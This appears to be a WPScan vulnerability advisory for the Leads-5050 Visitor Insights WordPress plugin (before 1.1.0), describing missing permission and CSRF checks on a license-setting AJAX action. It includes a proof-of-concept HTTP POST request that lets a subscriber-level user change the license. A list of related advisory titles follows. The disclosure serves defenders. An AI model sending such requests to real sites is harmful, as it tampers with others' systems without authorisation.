Leads-5050 Visitor Insights < 1.1.0 – Unauthorised License Change | Plugin Vulnerabilities

Description

The leads5050_set_license AJAX action is available to authenticated users, but is missing any capability and CSRF checks. This could allow any low privilege users (subscriber+) to set an arbitrary license in the plugins settings

Proof of Concept

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
Connection: close
Cookie: [subscriber+]

action=leads5050_set_license&api_license=AAAA3

Affects Plugins

leads-5050-visitor-insights

Fixed in 1.1.0

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

3a7636bd-9535-4c2c-8263-1f00fff1c296

Timeline

Publicly Published

2021-05-07 (about 4 years ago)

Added

2021-05-07 (about 4 years ago)

Last Updated

2021-05-07 (about 4 years ago)

Other

Published

Title

Published

2021-10-05

Title

Batch Cat <= 0.3 - Subscriber+ Arbitrary Categories Add/Set/Delete to Posts

Published

2021-03-16

Title

wpDataTables < 3.4.2 - Improper Access Control leading to Table Permission Takeover

Published

2021-10-19

Title

Download Plugin < 1.6.1 - Subscriber+ Arbitrary Plugin Activation

Published

2022-07-26

Title

WPGraphQL WooCommerce < 0.12.4 - Unauthenticated Coupon Codes Disclosure

Published

2021-10-05

Title

Simple Download Monitor < 3.9.6 - Unauthorised Log Reset